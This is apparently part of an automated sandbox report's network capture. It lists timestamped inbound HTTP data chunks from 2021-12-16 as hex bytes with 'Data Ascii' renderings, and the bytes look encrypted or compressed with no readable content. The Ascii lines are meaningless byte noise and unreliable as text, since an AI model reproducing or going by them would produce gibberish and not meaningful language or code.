                                                        2021-12-16 12:20:36 UTC21INData Raw: 5b 09 de 7c cd 91 0b 16 68 b8 b2 af 82 fb 08 5a 9a e6 a8 d2 af 37 b9 30 8b ff c0 14 b5 30 49 8a b8 36 6e d1 29 ab 64 30 78 b5 a1 e2 a5 14 8d f3 5b 07 2a 7e ea 0e d2 bd cb 0c 71 aa 05 77 14 a0 4e 8a 36 8e 6d 8d c7 22 10 23 ad 03 bc 7e fc 54 b5 65 75 60 7c 4e 7b a7 8a ff 82 69 d1 65 a8 08 d4 4e af 2d 5b b2 e1 04 77 a1 87 3a 8a c6 61 03 3d 82 1f 52 31 51 02 a4 d7 08 65 ed b6 40 07 5b 4b 23 5b fc bb 44 6b cd bc 0e 48 87 ee ed 6a 3f 65 30 85 8d 6f e0 77 17 e6 41 54 06 3a af 3c 76 04 cc 52 d8 f4 43 b1 a5 da 90 58 c2 10 c8 f0 86 39 54 4f 66 d9 79 69 43 e9 c6 59 24 45 aa a6 65 6f dc fb eb f6 69 d3 11 b3 3f eb 05 bd bd 52 67 2f 91 af 23 b2 28 46 92 b0 e0 2c 2e f9 c2 71 b3 5a a7 ee 0e af ef ed 86 a4 1f 85 62 54 6c 10 3e fd 29 51 04 e8 28 2c 41 8d 6d e8 b1 85 cf 1a
                                                        Data Ascii: [|hZ700I6n)d0x[*~qwN6m"#~Teu`|N{ieN-[w:a=R1Qe@[K#[DkHj?e0owAT:<vRCX9TOfyiCY$Eeoi?Rg/#(F,.qZbTl>)Q(,Am
                                                        2021-12-16 12:20:36 UTC22INData Raw: 80 d7 7c 1b 42 ea 36 52 b4 a7 4f 1c 60 0f 18 12 4b 3c 1a fa 4e 2e b4 2c 5d fd 16 68 73 de c1 d1 29 9f 82 ef a5 b6 f5 62 46 e1 84 74 32 6b 2b 33 5b a0 01 36 bf 8f e8 81 a6 c5 ed b7 66 fc f9 5a b4 8b 97 14 2e dc 39 c6 ca 6d fd 46 20 23 73 ea 4e dc a9 e3 66 c7 d7 d1 b0 18 93 c6 ff 91 22 4b 98 fb 01 9a 48 d8 fa ea d3 01 34 7c fb b4 cb 3d b1 e4 cd 4a 98 a6 9c 15 db 63 f7 ea ae 13 62 58 a8 a4 db 88 b0 aa 8d 0f db 33 f1 46 75 6f cf d7 98 07 ba 66 77 07 88 8a 8f a9 8d 71 44 f5 d3 b3 ce 16 62 ad b5 e1 53 64 be 1a a3 77 6d b5 bc 42 b4 9e 05 95 aa bb cc 6e 79 c0 a9 c0 9b 29 e9 f8 45 b8 c6 d0 28 1a 35 c2 22 13 70 72 ea fa 0b 87 24 76 38 12 d2 3e 53 33 a6 2e 5f f9 ab eb f3 62 13 71 0c 97 3e 74 d8 fa 24 2c 69 ac b0 e1 cc e7 b6 ef 37 55 26 a9 f0 0a d6 4c 38 f2 97 95 81
                                                        Data Ascii: |B6RO`K<N.,]hs)bFt2k+3[6fZ.9mF #sNf"KH4|=JcbX3FuofwqDbSdwmBny)E(5"pr$v8>S3._bq>t$,i7U&L8
                                                        2021-12-16 12:20:36 UTC23INData Raw: 12 28 7d e1 84 0a 37 4c c9 b2 a6 9a 05 0e 61 6a f1 fa f5 b7 3c bd b9 25 16 1b 34 b8 2a 52 a4 b8 3a 9b d0 02 b2 8d 3c 54 b4 95 32 a6 38 89 f2 45 27 bd 7e e5 26 d8 96 c5 3e c6 8e 7e 6e 1f b3 79 94 c8 29 41 86 c5 1a 13 4c 4e 15 af 70 ee c5 be 65 72 7c 93 4b 4f 54 89 bc 58 17 f3 6f ab 3c 19 4e 84 30 5a dd 8b 1e 89 aa a1 28 9b ad a8 12 39 93 f7 60 fe 51 0f cb da 1f 9b e6 e4 67 10 50 4f 2c df 14 92 46 69 e6 b3 20 c9 79 3d 4b 70 06 61 30 87 b9 74 1e ef 3b e9 57 0d 23 3a be 2e eb b7 e3 08 d5 f8 59 a2 b0 de 96 a2 d4 c2 ca c4 96 25 47 5a 62 d1 83 74 91 ed fc 50 29 7c b3 b5 70 6b d1 01 f0 24 79 f8 7b f5 1e f0 1c bb d2 b0 63 39 65 82 58 ac 2c 51 96 a1 f5 32 cd 06 ef 58 9a 3f b9 c5 66 50 01 16 93 4d c8 a5 6f 4a 77 89 3b d3 29 40 1b c0 d2 2d ee 83 45 db 9e 85 c5 06 cf
                                                        Data Ascii: (}7Laj<%4*R:<T28E'~&>~ny)ALNper|KOTXo<N0Z(9`QgPO,Fi y=Kpa0t;W#:.Y%GZbtP)|pk$y{c9eX,Q2X?fPMoJw;)@-E
                                                        2021-12-16 12:20:36 UTC24INData Raw: 0b 14 07 49 e6 34 45 df 9b a8 63 44 08 1f 0c 65 99 06 ea 44 06 98 33 53 09 97 4c 78 d9 dc 72 74 9c 82 eb 05 b6 8f 5d 5f 97 93 7f cc 6e 2f 30 5f b6 79 16 9b 8f ec 29 39 c1 e1 b7 6a 39 20 58 98 99 bd 0f 58 ef 26 d7 3d 6d fd 48 67 2a 71 ea 42 fe 94 ef 66 c5 49 27 b1 34 83 65 fe 92 22 4f e4 fc 76 a9 55 c9 f3 eb d3 0f 31 e6 e7 bd c1 15 9d f3 33 41 34 ac 84 19 df b6 05 16 af 3f 73 41 f8 75 c0 f6 be 82 6e 09 f3 3e 9d 3e 73 47 e1 dd 82 01 3a 66 68 0b 72 56 6e a0 8a 66 38 f3 aa 80 d3 ca 75 a0 b9 e5 73 73 43 1b 89 4c 4f 9d 5a 4a 34 90 2d 72 ac 66 65 03 01 c0 ab d5 eb 06 fc 86 45 a7 cb 2a 01 3b 3d c5 3c 13 bd 70 ea f6 29 90 2a 7a 3c c7 55 c2 52 1f a6 26 28 ca ba 8a e9 9c 12 59 26 b2 38 4c ad 2c ff d3 43 a6 30 e9 d7 d7 b6 32 8f 57 26 a9 d8 15 f6 6e 23 a4 9d 94 81 c4
                                                        Data Ascii: I4EcDeD3SLxrt]_n/0_y)9j9 XX&=mHg*qBfI'4e"OvU13A4?sAun>>sG:fhrVnf8ussCLOZJ4-rfeE*;=<p)*z<UR&(Y&8L,C02W&n#
                                                        2021-12-16 12:20:36 UTC26INData Raw: c7 67 da 7e 1c 31 53 dc a1 b4 82 ea 14 52 4a 19 85 fc b9 3e a8 3c ba 17 c0 38 b9 20 59 bb 9e 3f 7e d1 3f ab 85 23 aa bc a5 c2 a5 05 80 f1 53 0d 2a 73 e1 fc cc 82 de 14 67 89 4f 71 06 5e 48 bb c2 9e 4a 9c 13 27 18 53 45 10 a7 74 c7 51 a1 49 8c 7d ae 5a 7f bd 89 90 41 6b c0 64 ba 20 5e 54 84 30 5a a1 f1 01 a4 b3 b0 31 99 b2 b7 2e c3 89 25 6a c3 41 18 bc 06 0d 90 f3 b4 51 0b 50 5a 3f 5a 15 44 69 45 ec a8 3d 2d ae 02 19 73 0d 76 2b 96 ac 76 ff d6 e9 e7 6d 74 17 20 b5 35 5c 13 ef d2 c9 ef 5c be 4a df ab ac d2 37 d5 3e 86 36 4b 4e 71 db 87 79 74 f3 fa ab 3f 7a a0 a4 65 60 e8 13 eb da 72 c7 66 c1 14 f8 14 bf c3 ba 78 07 65 82 58 ba 13 55 93 a1 ee 34 c1 f3 ff 61 f7 0c bd fd 00 bc ea f6 b2 49 05 a9 76 58 59 21 d3 f8 05 4a 11 fb cc fb 7e 8f 5a eb a2 9e c5 06 fc 68
                                                        Data Ascii: g~1SRJ><8 Y?~?#S*sgOq^HJ'SEtQI}ZAkd ^T0Z1.%jAQPZ?ZDiE=-sv+vmt 5\\J7>6KNqyt?ze`rfxeXU4aIvXY!J~Zh
                                                        2021-12-16 12:20:36 UTC27INData Raw: 64 0b 4b f7 39 72 bd a9 b1 17 5f 0e 0e 07 57 48 16 e5 6a 39 bd 33 59 01 06 4b 69 df b7 b7 30 9f 88 f8 0f b8 f5 7f 40 3f 88 70 ce 7b 08 10 4a b7 7f 34 b5 9e e3 39 6f da ee b5 7f eb 2f 4d 99 99 b5 1b 3f d3 25 7f 26 62 ff 5d 40 0b 64 eb 44 dc a3 fe 77 c0 d3 f9 a2 3b 96 a9 e0 4b 35 99 6b c8 01 9a 4d a4 eb e9 c2 04 08 fc f2 ac d6 15 ac f2 33 41 a5 ab 95 08 0d 78 e1 16 be 30 59 48 81 46 d3 9b b8 93 61 17 ca 3b 48 e8 66 60 c7 cc 8d 23 ac 6f 68 01 7a 9a ac b8 5c 75 35 ee c2 bc e2 a2 7c a0 b3 ec 4a 70 5a cd 9c 6b 69 8c 55 68 a2 99 2d 78 bb b6 db 0e 1b d1 a4 1c 47 26 ea fa 5c a8 e3 38 28 36 34 d6 3f 2a 96 6a 3c ef a6 89 2f 6d e2 0d 12 4d 79 1f a4 38 40 fd a1 e5 ee 8d 16 4b 1f b9 13 59 aa 04 d1 d0 52 a0 df fe d6 d7 b8 d6 d0 54 26 a9 d2 2a d8 dd 3a da d5 0b 81 c0 a0
                                                        Data Ascii: dK9r_WHj93YKi0@?p{J49o/M?%&b]@dDw;K5kM3Ax0YHFa;Hf`#ohz\u5|JpZkiUh-xG&\8(64?*j</mMy8@KYRT&*:
                                                        2021-12-16 12:20:36 UTC28INData Raw: 70 cd 88 0a e3 51 e8 b0 b7 8e fb 07 5b 9a e6 a8 d2 a0 30 b9 3f 8b ff c0 14 b1 18 5d 8f 69 2e 67 5f 99 a2 9a 19 0d bd 89 ca 8d 0f bb d0 47 79 2b 79 f2 c7 d3 91 dc 0c 4f ab 55 6e 15 b7 c4 c8 c8 8f 40 95 cf 25 19 5a 21 37 bd 74 dc d7 af 6f 1d 49 83 4f 5d b9 8c b8 5c 68 d1 65 a9 57 a9 4c 85 3a 43 b7 ce 09 88 a0 a1 20 8c c6 30 03 3d 82 1a 67 c3 4c 1d 8c 51 1c 9b ea 8c cf 17 50 4b 25 51 16 ae 40 ca e6 b9 3c 2f f4 2e 12 6c 14 4d 06 97 bd 67 f7 62 28 e6 41 72 2e 8c be 2a 6f 28 ae d2 d8 fe 54 67 39 f5 87 a6 c2 2f cc f9 93 29 7c 46 61 c0 81 70 e2 eb d0 55 3f 45 a5 b7 7f 7d d1 02 48 cb 73 c3 68 52 00 eb 0f be 70 b0 6c 3c 97 92 78 bb 2f 5a 1f 8e e4 36 d1 eb e3 65 95 02 ab 61 1b a2 e9 ff 07 4b 13 be 4f e4 46 0e 27 df 38 4d 16 60 fa 32 7c 88 53 41 99 94 c5 17 ed a7 85
                                                        Data Ascii: pQ[0?]i.g_Gy+yOUn@%Z!7toIO]\heWL:C 0=gLQPK%Q@</.lMgb(Ar.*o(Tg9/)|FapU?E}HshRpl<x/Z6eaKOF'8M`2|SA
                                                        2021-12-16 12:20:36 UTC29INData Raw: 02 61 c8 34 5a ad c7 c9 1d 4c 02 0c 28 5c 81 14 ca 2d 32 bd 33 59 2f 1b 43 69 df c9 b8 5e a2 83 eb 0d 77 e0 69 4c 34 96 7e cc 6a 00 32 81 b0 7e 3e bf 9e f9 0f be d8 f4 d8 39 e4 07 51 44 a1 5f 10 2e dc 37 89 36 0b fd 4c 0f f2 72 ea 44 df 90 e6 e6 cf c9 6f 77 34 87 b8 84 b8 23 4f ec f0 23 84 c1 9c fb eb d2 18 3a f3 fc 30 ec 3d b9 f2 20 6f a5 a1 9b 01 ca 48 f8 0a 87 2a 70 5e 8a 57 dc 9e a7 a6 78 12 c3 1d 8b 3f 75 65 d4 ff 93 2f d5 44 69 0b 7c 9a 81 b3 a9 09 11 ed d3 b9 db 96 6a cf 95 e0 5b 75 51 39 96 0b 46 9c 5a 4a a5 ba 42 5c a9 bb c0 10 05 d6 b8 ce 1f 82 8a d7 4c a7 c1 3d 0c 29 7e 48 11 3b 99 71 f9 dd b8 bd 35 52 29 3b d2 df 12 37 b1 38 53 f3 d0 dc e0 9c 18 4e 28 ad 1d 5d 8a 6b fe d2 43 a6 a3 c6 c6 f0 9a f6 fd 55 2c 81 8d 08 d6 5b 12 f4 97 94 87 af d8 2d
                                                        Data Ascii: a4ZL(\-23Y/Ci^wiL4~j2~>9QD_.76LrDow4#O#:0= oH*p^Wx?ue/Di|j[uQ9FZJB\L=)~H;q5R);78SN(]kCU,[-
                                                        2021-12-16 12:20:36 UTC31INData Raw: e6 80 1d 1c 43 cd ad a3 91 f4 0f 5c 6b f8 9d 2e b6 10 95 26 9f 15 e9 b9 b1 33 59 b3 3c 2b 65 d1 2f a3 94 20 5a ab 98 c6 bd 8e a3 c8 47 0c 20 db e3 fe c7 85 da 19 4f 30 54 6e 15 bf 53 84 c7 8f 50 89 db ca 12 60 52 12 b0 6c 46 73 85 9b 8d 83 9d 46 44 a5 88 81 44 76 c6 91 aa 14 3e 5d 8f 28 ca 9a f7 1e 89 aa b8 35 97 b1 bb 0c 3d 99 06 7e c0 b4 08 88 fa 0f 9e f6 16 7d 10 50 4a 0c f3 02 ba 62 7e 6a 86 36 37 79 39 a4 6c 15 6f 18 cc bd 6d ea f9 c1 6b 6a 73 06 3b ad 2e 7a 13 e7 dd d8 e5 4c ae af 20 86 8a e8 3e e3 db 94 3d 5e 57 4a 5c 87 68 65 fd d6 57 16 15 af a6 7e 69 e8 46 eb da 72 c5 76 f6 9b eb 0f b5 a1 d5 66 2f 9d 89 6b b3 28 4d 92 b0 eb 29 c6 06 ef 58 95 05 b0 e5 9a 96 ed 17 64 a5 01 be 74 4c 46 1f 22 e6 26 be 01 dc db 3c 61 9c d5 e2 57 7b 3a e8 f8 67 84 52
                                                        Data Ascii: C\k.&3Y<+e/ ZG O0TnSP`RlFsFDDv>](5=~}PJb~j67y9lomkjs;.zL >=^WJ\heW~iFrvf/k(M)XdtLF"&<aW{:gR
                                                        2021-12-16 12:20:36 UTC32INData Raw: 49 e6 74 5a ab b9 a7 10 74 88 1f 08 4d 9e 0c f6 bc 2f 90 3b 54 3a 6f 44 78 d9 c5 a2 31 96 9a 15 06 85 fe 78 4d f0 96 7f c5 77 f9 39 70 be 7a 3b f5 98 3a 77 a7 c4 e1 be 74 1a 06 77 9f a1 db 10 2e dc 24 a4 35 64 e4 b2 4e 0f 7b ef 47 d2 a7 35 6a 9b d3 22 b1 3d 99 46 f6 bd 27 58 cc fc 08 97 4c be ec 15 d2 27 1b f4 e9 bd ce 26 47 f2 1f 41 b6 a1 ce 88 c4 61 dd 0a b3 32 71 57 96 b8 d8 a4 b4 95 63 0d d2 2a 97 c0 74 43 c7 f6 87 33 c1 91 97 f4 61 80 88 a8 88 63 70 7d cc be e4 b6 6b ab bc c4 11 68 96 4f 8a 2e 63 ac 9f 56 9e 98 3e 42 aa bb f7 01 01 c0 ea ca 91 24 f3 f4 66 88 cb 26 31 c8 3f e9 37 45 ae 70 ea f8 da d6 2b 7a 32 11 dd cc 52 17 b3 c7 52 d5 a1 ec ed 9c 1a 4b f0 bd 17 4e bc 08 db db 5a 52 b1 cd d5 fc b0 c4 33 52 24 c6 95 0b d6 57 10 da 95 94 92 f0 a2 2d db
                                                        Data Ascii: ItZtM/;T:oDx1xMw9pz;:wtw.$5dN{G5j"=F'XL'&GAa2qWc*tC3acp}khO.cV>B$f&1?7Ep+z2RRKNZR3R$W-
                                                        2021-12-16 12:20:36 UTC33INData Raw: d9 58 19 50 c4 b2 ad 82 fb 0f 06 64 e7 84 c4 b7 3c b9 35 92 01 c1 13 fa 37 77 f3 b0 2c 6f be 76 b1 9a 3b 5e bb 07 7b ac 3f c9 f1 d0 0c 2a 73 f6 9f 4b 91 cd 05 74 9c 43 7f 1b 2e fe 41 c3 88 56 5c d2 e2 9e 67 5f 03 bd 7e d0 5c af 61 fc cb 36 d3 46 ae 9e 96 5c 78 d5 e1 1c 10 24 4d 85 3a 7b b9 ce 30 8b a0 ad 42 d1 a8 a8 09 47 94 0e b7 c5 90 1e 72 5d 35 9b ec 9b 4f 19 46 50 b8 4c 15 b8 dc f5 ef a0 35 83 e4 17 04 65 0f 62 18 83 bc 6d ea e7 1e 68 f6 6b dc 3f d2 09 65 00 f4 d2 d8 f4 33 f1 ef f6 16 a6 c3 36 7f 74 9c 34 da e9 75 1a 82 48 6f ed d0 55 63 e2 32 af 5e 6b c0 05 f9 ea 7d d4 f7 de 3f eb 47 bf d2 b0 4f b8 9b 83 7e ad 54 da 92 a1 ee 3b d9 76 59 54 67 14 bc fd 3b a4 d6 c9 98 5a 18 da 3d 42 46 04 57 d1 be 40 00 fa d5 42 f5 84 45 d1 bd 8d 4b a0 c7 88 97 5d 35
                                                        Data Ascii: XPd<57w,ov;^{?*sKtC.AV\g_~\a6F\x$M:{0BGr]5OFPL5ebmhk?e36t4uHoUc2^k}?GO~T;vYTg;Z=BFW@BEK]5
                                                        2021-12-16 12:20:36 UTC34INData Raw: cd c9 be 11 17 50 ae a0 40 f7 46 4a 35 81 f1 bf b2 30 6c 0f dd 3b 21 fe 21 ff a8 99 f3 b8 b7 ab 75 a7 87 db 8d e9 63 4f cc 08 00 40 78 99 66 d4 be aa 81 43 a7 8f 2b 31 f0 47 33 00 64 b9 34 39 75 18 01 ca bc f5 dc 80 9c ee 23 69 fe ac 86 ef f0 2d ee 15 a7 e0 69 b6 22 b6 97 ae 3c 4d a0 60 eb 4e f1 07 18 73 ad 0f 58 0d 45 47 70 15 4a 22 bf be ea 96 58 b9 a0 6e 50 df 4d f1 cf a5 b9 a6 53 18 da 72 c8 91 11 72 31 c5 b2 a5 aa 99 0e 4d 6e f4 8e f8 20 3c b9 3d 83 0b ae a0 b3 33 55 b7 ba 3d 63 c0 25 a6 8b 3a da 0a e6 65 a7 14 81 c8 53 63 ed 79 f2 fa fe 3f 13 19 76 8c 21 55 1f a0 48 bb c4 9e 55 f3 fe 34 13 4d 30 54 bc 74 dc 96 af 63 75 6a 85 c1 e0 c5 21 90 4b 63 f9 5f a8 38 37 5f 80 21 55 b7 e5 10 8d 88 c8 30 88 a3 a5 2b aa 88 09 6b db 25 91 a4 d0 14 88 e8 8b 44 01
                                                        Data Ascii: P@FJ50l;!!ucO@xfC+1G3d49u#i-i"<M`NsXEGpJ"XnPMSrr1Mn <=3U=c%:eScy?v!UHU4M0Ttcuj!Kc_87_!U0+k%D
                                                        2021-12-16 12:20:36 UTC35INData Raw: 03 3b cd ce 09 f5 ce b0 9e 43 59 d0 01 a4 fd c1 62 ea 26 07 5e 47 08 76 1b bb 9c 8f 00 21 26 bf 28 bc b7 5c d9 05 e8 6a 58 28 41 00 7d 90 2b 65 da c5 e7 3c 2b a7 e5 7b 4a e2 08 b9 02 02 c6 85 c9 a0 19 46 2b 53 40 5f f6 11 4e 4f 52 f1 91 28 8d 30 c6 ba b8 49 f1 b1 4e ab f3 f0 20 5b f3 6c 4f 22 09 c3 78 c3 37 50 55 fb 8c b7 06 3f 95 59 ae e9 40 7f e5 77 7f f9 2e 86 2f f6 0e f3 07 20 86 df 18 53 49 e6 3c 86 a3 af de 06 4d 08 15 22 4d 9e 04 f6 42 2e be 33 6d 03 0d 1c 78 d7 d8 af 31 9f 80 eb 09 a9 a0 06 46 e3 9b 7f cc 6a 1c 08 58 b6 f8 3e bf 8f a1 23 b9 d8 f5 bc 1d 80 06 5b 92 95 cc 75 2f dc 35 a4 3c 65 f5 48 20 38 73 ea 4e b9 28 ef 66 c5 a6 0a b0 34 8d ab f1 e2 0b 4e e6 e9 12 9f 5d b2 ea ed bc 21 18 ec ee ac c2 25 d6 df 32 4b be b5 81 01 b4 46 ef 14 a5 3c 59
                                                        Data Ascii: ;CYb&^Gv!&(\jX(A}+e<+{JF+S@_NOR(0IN [lO"x7PU?Y@w./ SI<M"MB.3mx1FjX>#[u/5<eH 8sN(f4N]!%2KF<Y
                                                        2021-12-16 12:20:36 UTC37INData Raw: c4 ce 80 e9 51 88 a2 7a 00 0f 4a 35 94 8f 9f b5 30 7c 1b ca 24 d7 d7 23 c4 b9 99 f0 97 1f bb 75 ad ea 42 fb e8 69 54 ec 57 df 42 72 ba 24 81 98 bb 8f 79 a5 e1 54 7d f0 45 48 01 6c 91 7c 2a 70 00 6b fa ea f5 d6 95 10 ee 7d 69 fe a0 8a e6 cb 05 ed 04 a6 f3 6d 4d 4c c5 80 a6 16 23 c1 61 eb 6c f1 12 33 30 94 68 36 cf 4f 6a 77 22 dd 31 b8 b4 e8 9d 56 b3 59 79 7b 5a 84 d3 66 a5 bd bf 5d 16 db 6f ca 80 0c 1a 4f c9 4c ae ae f3 1e 4b 48 bd 9b de a4 3b b9 26 95 1c 3f 39 9f 35 56 88 fa 32 76 d6 2e a1 9d 2d aa bc a5 c5 d9 58 8b d9 43 01 37 6a f5 f0 c2 96 d4 f1 66 b4 51 6a 13 ba 5a 90 c8 9e 46 9e 3b 35 3f 4b 5c 15 8f 6a cf 59 b9 65 63 7b 94 b1 56 86 8b 87 58 6e d1 7e ac 27 3e b2 84 1c 52 99 e3 26 ee 5e 54 ce f6 dc a9 03 37 a0 71 60 d2 40 0a a0 d5 36 0d ec 9a 44 3a 4b
                                                        Data Ascii: QzJ50|$#uBiTWBr$yT}EHl|*pk}imML#al30h6Ojw"1VYy{Zf]oOLKH;&?95V2v.-XC7jfQjZF;5?K\jYec{VXn~'>R&^T7q`@6D:K
                                                        2021-12-16 12:20:36 UTC38INData Raw: 7b ac be 0f 81 ae b0 9e 47 6a a1 06 a4 81 e9 dc ea 6b 0d 31 6b 1d 7d 62 d9 b5 12 08 2d 53 a4 49 bc bd 55 f3 e0 a2 6a 5e 04 ec 06 0e b3 45 58 d1 d6 e8 2b 06 29 e1 14 66 9d 68 b3 13 03 f6 4a e7 a1 1f 64 84 56 58 3a b4 2d 4f 45 5b df d0 6b 8e 3a d3 c0 c9 4c 9e 9b 67 01 fb e3 21 62 4a 7d 4b 3e 77 fa f7 74 52 79 7c 58 84 bc de 5b e4 5c c1 8a 69 db ed 7e 16 b9 91 86 25 20 bf c4 0f 0c 8a d0 18 85 48 e6 3c 35 29 a9 b1 17 5f 0f 34 6b 5f 99 2d 69 43 2e b6 3f 55 0b 78 64 79 d9 d2 a2 38 b7 ad eb 07 a3 d7 6c 6d a0 92 57 7f 6a 07 3e 4f b2 6e 3a 31 38 fa 12 83 d8 e5 a4 67 f2 14 53 b3 b0 ae 19 3f d4 a5 ba 33 7c fb 4b 67 07 72 ea 4e c5 b5 fe 63 e7 f8 2f b1 3e ab b1 e6 94 2a 46 ce 52 01 9a 4a a6 f3 fc 05 18 11 fd ec ac ce b3 0e c1 fc 59 b3 8c 00 18 db 61 c3 80 71 31 63 59
                                                        Data Ascii: {Gjk1k}b-SIUj^EX+)fhJdVX:-OE[k:Lg!bJ}K>wtRy|X[\i~% H<5)_4k_-iC.?Uxdy8lmWj>On:18gS?3|KgrNc/>*FRJYaq1cY
                                                        2021-12-16 12:20:36 UTC39INData Raw: 7f 89 17 51 a8 ad 40 d7 60 c0 34 8b 8f 9b dd bb 6c 1c df 45 a5 d7 0f f6 80 82 f6 90 95 83 52 ad e8 27 e2 25 69 5e ce 31 da 2d bf 9f 09 8e 93 62 55 7f be 9c 31 46 f0 47 38 3d 60 80 7a 4c 4e 12 6e 80 d3 a2 d6 91 9e 5d 05 7c db 8e a2 e9 d8 08 e0 03 2c f9 67 b3 4c e2 be 96 36 22 ca bf ec 42 8d c0 33 3a b6 31 30 e5 45 47 7b 21 d6 22 bd b4 ff 9a 2b d7 a7 6e 57 51 fa 9e 66 a5 bf ac 21 89 d6 69 d7 80 1d 1c 43 f4 b1 af d6 fa 0f 4d 33 e7 84 c1 a1 2f bc 0f d2 00 c1 38 b3 22 5a bf 4f 2d 49 df 2c 98 b5 31 54 b7 b0 01 a7 14 8b c5 54 09 2a 68 f7 e7 2d 90 e1 0c 7f 8b 51 6e 0e a5 57 69 c9 a3 47 ad a2 2b 1a 5f 5a 03 ad 71 c9 40 40 64 5e 6d 8a 67 08 a9 88 96 24 f4 d1 6f a1 14 11 53 8e 23 55 b2 f7 1b 95 5e aa 1d 83 ab 80 8e 3c 88 03 72 d6 57 1a a1 d0 0f 9e f3 96 bc 11 7c 43
                                                        Data Ascii: Q@`4lER'%i^1-bU1FG8=`zLNn]|,gL6"B3:10EG{!"+nWQf!iCM3/8"ZO-I,1TT*h-QnWiG+_Zq@@d^mg$oS#U^<rW|C
                                                        2021-12-16 12:20:36 UTC40INData Raw: af b0 13 ff ce b1 9c 43 76 e0 5c 29 87 d7 62 ea 6b 07 5e 56 cc 7d 64 03 9d 9e 10 2d 55 db 32 8c ba 51 35 7e a0 6a 02 2c 52 17 11 b5 a7 4e d0 d6 e3 3e 26 a7 eb 02 76 7f 19 bb 04 11 42 fb ed b9 0f d0 2b 5e 41 26 47 01 46 5f 47 45 e9 21 96 2c 49 af a1 50 88 03 5e a3 e4 f5 bb 5b fc 63 5d a8 09 cf e9 7d 4e e3 45 f3 99 b6 ce b9 95 54 de 85 57 e3 fe 76 1b 93 36 81 33 35 dc d1 1b 0d 80 dc 75 8a fe f9 26 80 bc 7e 3c 36 4c 08 1e 04 4f 81 0a e2 54 2c 32 84 4c 0c cd 6c 6d d8 d8 a5 42 08 83 eb 01 ba fc 71 56 64 b0 7f cc 6b 14 3d 54 38 c8 2f ba 01 5b f9 ae 13 f6 61 e3 cf 07 5b 99 94 b7 18 a0 6b 20 b9 ef 7c f8 5a 50 33 5a ff 45 d6 ba e7 70 c6 df 27 3f 83 96 bd 79 26 f8 67 f3 e2 01 90 64 20 fb eb d9 1a 1f ef e3 a9 ce 2c bc 9c ab 4a b4 a2 eb 02 da 6b e4 07 ab 2e 75 76 1c
                                                        Data Ascii: Cv\)bk^V}d-U2Q5~j,RN>&vB+^A&GF_GE!,IP^[c]}NETWv635u&~<6LOT,2LlmBqVdk=T8/[a[k |ZP3ZEp'?y&gd ,Jk.uv
                                                        2021-12-16 12:20:36 UTC42INData Raw: 89 16 50 a4 9b 42 c3 43 4a 3b 91 85 8c b3 2b 5d 14 d5 67 2c d6 0f a3 a8 9f e4 e3 29 ab 75 a7 e2 2b a5 2d 69 5e c2 4f 18 42 78 95 21 12 bf aa 81 3d 38 99 44 77 e3 42 28 14 78 b9 12 3a 75 14 78 0c bb f5 d6 90 80 95 cf 41 5d a6 95 e3 f0 13 ed 15 ab e1 76 b6 59 c1 fb ad 36 24 d6 ec ec 44 e2 12 27 2e a8 33 94 cf 45 4d 52 2c d6 22 b5 a7 fd 93 55 33 98 78 57 50 ec b6 fe a4 b9 a6 77 17 c7 78 d5 0c 22 1d 50 c5 a4 87 1a fa 0f 47 48 e9 54 99 b7 3c bb 1f 86 01 c1 32 a0 34 74 a8 61 66 65 d1 2c 98 8e 31 54 b7 9a cb b1 07 83 a7 32 0d 2a 73 e1 f9 c5 83 c5 1d 6e b0 37 6e 1f a6 c5 a8 c8 8f 40 95 c3 25 15 64 05 03 bc 7e c0 64 b9 63 79 a1 12 4b 57 aa 99 99 47 1a 48 6e ab 32 22 46 94 3a 42 9b ce 70 8a a0 ad 19 12 a8 a8 09 2c a1 21 0e d1 4a 0f cb 4b 1f 9b e6 8b 48 02 79 63 54
                                                        Data Ascii: PBCJ;+]g,)u+-i^OBx!=8DwB(x:uxA]vY6$D'.3EMR,"U3xWPwx"PGHT<24tafe,1T2*sn7n@%d~dcyKWGHn2"F:Bp,!JKHycT
                                                        2021-12-16 12:20:36 UTC43INData Raw: bc 09 f9 c8 a1 bf 2c 58 e1 05 ae 59 ce 47 c2 5c 07 5e 5c 0f 5a 40 e7 9d 8f 00 f3 55 cb 3a ab 6b 42 c8 6f b3 7b 73 12 27 fb f1 46 3b 6e c7 00 f1 26 3f bd f2 3e 5e 62 f4 4c ec d9 d1 cf cd 96 19 4c 30 45 70 18 e3 10 4e 4f 8f d9 fe 03 8a 10 d5 be a9 0d aa 9f 4f ab f9 e3 27 d4 f6 7d 4b 59 1a c7 f6 7f 5d 7f 54 f4 86 bc d8 3f 84 5c c0 8e 41 7f ef 6f 10 91 2f af 20 2a d0 c3 0b 0c 80 d9 77 04 49 fc 36 5a aa bb 81 1a 4c 1e 1c 08 4d fe 05 ea 53 38 af 39 6b 05 14 44 78 d9 c9 a5 2e 87 7c ea 2b b2 fc be 0c e9 9b 7e e4 7e 07 38 56 9e 08 3f bf 85 c4 32 b9 c9 eb a4 6b fb 1e 48 92 99 ae 1a 39 22 3e 85 36 75 ee 46 4f 32 78 f5 48 28 b1 c3 74 de cc 07 05 34 87 b2 7b be 22 4f e7 f0 04 85 41 a4 f1 eb c2 01 06 f9 1a bc eb 34 81 40 31 4b b4 bb 92 0a d1 6b ff 1e b0 21 8f 5f ac 41
                                                        Data Ascii: ,XYG\^\Z@U:kBo{s'F;n&?>^bLL0EpNOO'}KY]T?\Ao/ *wI6ZLMS89kDx.|+~~8V?2kH9">6uFO2xH(t4{"OA4@1Kk!_A
                                                        2021-12-16 12:20:36 UTC44INData Raw: 8b 50 a4 a1 6a 56 0c 4a 33 9c ad 21 b3 30 67 0f d3 3c 3a d3 24 d6 b9 99 e4 95 09 a6 7c 85 62 2e 8d ef 06 c3 c4 20 d4 6e 69 96 21 0f bd aa 8d 3d ae 99 44 77 dd 43 30 1d 47 9f 6f 3c 62 c4 7d 84 ad f0 c7 97 1a 36 e9 a7 f6 8e d5 ea d8 04 c5 99 a2 ec 61 9b f8 e9 96 a8 3c fc d5 44 c3 73 e2 13 39 29 b8 68 8d cf 45 4d 70 15 ee 22 bf be 27 9a 4f 95 a6 68 57 51 fa 9e 66 a5 cc d9 5b 1c cc 7c cd 81 06 2d 54 c4 3b ae 82 fb 6c 4d 64 f6 9b cc 9f 87 b9 37 98 29 4c 3b b3 35 77 80 b1 2c 6f dc 27 98 23 31 54 bb 82 bf 1d 14 8b d3 4d 0b 45 aa f2 f0 d9 82 c2 19 74 96 6c 23 1e a0 49 86 c7 9e 4f 1c d6 30 02 48 77 32 bc 74 dc 67 bb 5d 40 7d 82 4f 46 ae fb 1d 4a 69 d7 7c ac e6 